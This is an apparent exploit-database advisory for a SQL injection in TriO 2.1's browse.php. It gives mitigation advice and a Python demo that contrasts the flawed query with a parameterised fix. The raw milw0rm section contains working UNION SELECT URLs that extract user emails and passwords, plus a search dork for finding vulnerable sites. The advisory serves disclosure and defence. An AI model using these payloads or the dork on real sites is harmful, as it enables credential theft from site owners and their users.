Vendor: TriO
Discovered by: dun
CVSS Score: 9.3 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: TriO
Affected Version From: 2.1 and prior
Affected Version To: 2.1 and prior
Patch Exists: YES
Related CWE: N/A
CPE: a:willo:trio
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

TriO <= 2.1 Remote SQL Injection Vulnerability

TriO 2.1 and prior are vulnerable to a remote SQL injection. The 'id' parameter of browse.php is placed into a SQL query without validation or escaping, so an attacker can neutralise the intended WHERE clause with a negative id and append a UNION SELECT of their own, all within a single crafted HTTP GET request. The published proof of concept reads the EMAIL and SUPERSECRETPASSWORD columns from the default Webusers table; any other table or column the application's database account can read can be extracted the same way.

Mitigation:

Upgrade to the latest version of TriO; the vendor has released a fix. If upgrading is not immediately possible, close the hole at the application layer by rejecting any 'id' value that is not an integer and passing it to the database as a bound parameter instead of concatenating it into the query string. A web application firewall rule that blocks UNION SELECT in the id parameter reduces the risk but does not remove it, since the injection point itself remains.
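The following is an added example, not TriO's own code, that reproduces the query mistake described above and the parameterised fix from the mitigation against an in-memory SQLite database. The Webusers table and its EMAIL and SUPERSECRETPASSWORD columns are taken from the advisory; the items table, its sample rows, and the exact shape of browse.php's SELECT (a single column, which is what the advisory's single-column UNION requires) are constructed assumptions.

```python
import sqlite3

# Payloads from the advisory, URL-decoded ('+' in the PoC URL is a space).
PAYLOAD_EMAIL = "-1 UNION SELECT EMAIL from Webusers--"
PAYLOAD_PASSWORD = "-1 UNION SELECT SUPERSECRETPASSWORD from Webusers--"


def build_db():
    """Constructed sample database: 'items' is an assumption about what
    browse.php lists; 'Webusers' matches the advisory's default table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO items VALUES (1, 'First collection'),
                                 (2, 'Second collection');
        CREATE TABLE Webusers (EMAIL TEXT, SUPERSECRETPASSWORD TEXT);
        INSERT INTO Webusers VALUES ('admin@example.com', 'hunter2'),
                                    ('alice@example.com', 'letmein');
        """
    )
    return conn


def browse_vulnerable(conn, id_param):
    """Assumed shape of the flawed query: the raw 'id' value is pasted into
    the SQL text, so everything after the leading number is parsed as SQL.
    With id=-1 the real WHERE clause matches nothing and only the rows
    selected by the attacker's UNION come back."""
    sql = "SELECT title FROM items WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def browse_fixed(conn, id_param):
    """Hardened version: insist on an integer, then bind it as a parameter
    so the driver never treats the value as part of the statement."""
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT title FROM items WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (id_value,))]


def is_rejected(conn, id_param):
    """True if the hardened handler refuses the value outright."""
    try:
        browse_fixed(conn, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, id=1      :", browse_vulnerable(db, "1"))
    print("vulnerable, EMAIL     :", browse_vulnerable(db, PAYLOAD_EMAIL))
    print("vulnerable, PASSWORD  :", browse_vulnerable(db, PAYLOAD_PASSWORD))
    print("fixed, id=1           :", browse_fixed(db, "1"))
    print("fixed, EMAIL payload  :",
          "rejected" if is_rejected(db, PAYLOAD_EMAIL) else "ACCEPTED")
```

The advisory's payloads select exactly one column, which only works because the original SELECT also returns one column; a UNION with a mismatched column count is a syntax error, and against a wider query the attacker would have to pad the injected SELECT with NULLs. The hardened handler does not rely on that detail: once the value must parse as an integer and is bound rather than concatenated, no UNION of any width can reach the parser.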

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##############################################################
 #   [ TriO <= 2.1 ]   Remote SQL Injection Vulnerability     #
 ##############################################################
 # 
 # [ Script: "TriO, iO's new web-based module, enables you to quickly, easily, and securely make your collections..." ]
 #
 # [ Script site: http://www.willo.com/io/trio.asp ]
 # 
 # [ Default table_name with users: Webusers ]
 # 
 # [ Vuln: browse.php ]  
 # http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
 # http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--
 #
 # 
 # [ Dork example: "This website is powered by Trio" ]
 #
 #####################################################
 # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
 #####################################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-07-26]